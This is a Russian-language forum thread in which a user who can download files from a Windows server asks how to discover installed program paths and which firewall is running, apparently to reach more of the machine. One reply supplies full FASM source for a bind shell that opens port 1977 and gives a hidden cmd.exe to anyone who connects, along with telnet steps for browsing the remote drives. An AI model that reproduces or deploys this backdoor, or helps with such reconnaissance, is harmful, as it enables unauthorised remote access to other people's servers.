Откуда их можно узнать? скажем, у меня есть возможность скачивать любые файлы со своего сервера Windows server, смотреть список файлов в любой папке, но сами папки не вижу. Наверняка где то записывается какие программы где установлены?
Чего? Кажется мы друг друга не понимаем. Зачем тебе что-то загружать на сервер и запускать? Ты же отправляешь серверу команду "показать_содержимое_такой-то_папки", он смотрит какие файлы там лежат и выдает тебе результат. Или я нифига не понял о чем ты спрашиваешь
файлы то выдает, а папки не показывает. Например на диске C вижу только это AUTOEXEC.BAT bootfont.bin boot.ini pagefile.sys ntldr NTDETECT.COM MSDOS.SYS IO.SYS CONFIG.SYS Узнать имя пользователя можно из логов WindowsUpdate в c:\windows\, а дальше?
x86 Полный путь в вашем случае есть сетевой путь. Где конкретно находится файл на диске - сервер вам не покажет и показывать не должен. Все организованно так, что данную информацию получить вы не можете.
Я знаю что файл лежит рядом с программой, мне же нужно узнать путь до этой программы. Я знаю что для этой проги есть правило в фаерволле, и это правило наверно можно скачать как в PC Tools firewall. Еще из логов WindowsUpdate что папке windows я знаю имя пользователя чтобы зайти в C:\Documents and Settings\ИМЯ\. Неужели из всего этого нельзя что то сделать?
x86 Предположительно у тебя есть доступ в расшаренную папку на удал машине. Твоя задача просмотреть содержимое всех дисков на этой удаленной машине. Предположительно на удал машине нет фаервола и антивиря. Ты свободно запускаешь там сетевые приложение которой откроет заданный сетевой порт. Тогда дорога тебе в сторону bindshell- ов товарищ (как там КПРФ кстати еще не победил?) Предположительно ты пишешь на fasm-е. Тогда на удаленном сервере из-под терминала запускаешь прогу дающую тебе твой shell. Код (Text): format pe gui entry x include 'win32ax.inc' section ''code import writeable readable executable library kernel32,'kernel32',ws2_32,'ws2_32' import kernel32,CreateProcess,'CreateProcessA' import ws2_32,WSAStartup,'WSAStartup',WSASocket,'WSASocketA',htons,'htons',htonl,'htonl',bind,'bind',listen,'listen',accept,'accept' x: invoke WSAStartup,0202h,a invoke WSASocket,2,1,6,0,0,0 mov [b],eax mov [c.sin_family],2 invoke htons,1977 mov [c.sin_port],ax invoke htonl,0 mov [c.sin_addr],eax invoke bind,[b],c,sizeof.sockaddr_in invoke listen,[b],1 invoke accept,[b],c,d mov [e.cb],sizeof.STARTUPINFO mov [e.wShowWindow],0 mov [e.dwFlags],STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES mov [e.hStdInput],eax mov [e.hStdOutput],eax mov [e.hStdError],eax mov [e.lpTitle],0 mov [e.lpReserved2],0 invoke CreateProcess,0,'cmd',0,0,TRUE,0,0,0,e,f ret a WSADATA b dd 0 c sockaddr_in d dd sizeof.sockaddr_in e STARTUPINFO f PROCESS_INFORMATION Потом пересаживаешься на свою машину и запускаешь ... Код (Text): telnet IP_сервера 1977 [Enter] Теперь ты получил командную строку с удаленного сервера. Далее шагаешь по папкам с помощью команды "cd" и "dir". Говоришь тут дядям "Спасибо!!!" ... и идешь разбираться с подробностями )))
Не, нету, и залить туда ничего пока не могу. Чтобы залить этот код мне надо скачать тот файлик. Файрволл и антивирус есть, должны быть по крайней мере. Тогда как узнать какой там фаерволл? Может по списку драйверов можно понять? Вот список:
ТОлько ярлык на Рабочем столе, если он есть. Файлы реестра не дают читать. Стандартные проги имеют стандартные пути для установки. Это все.
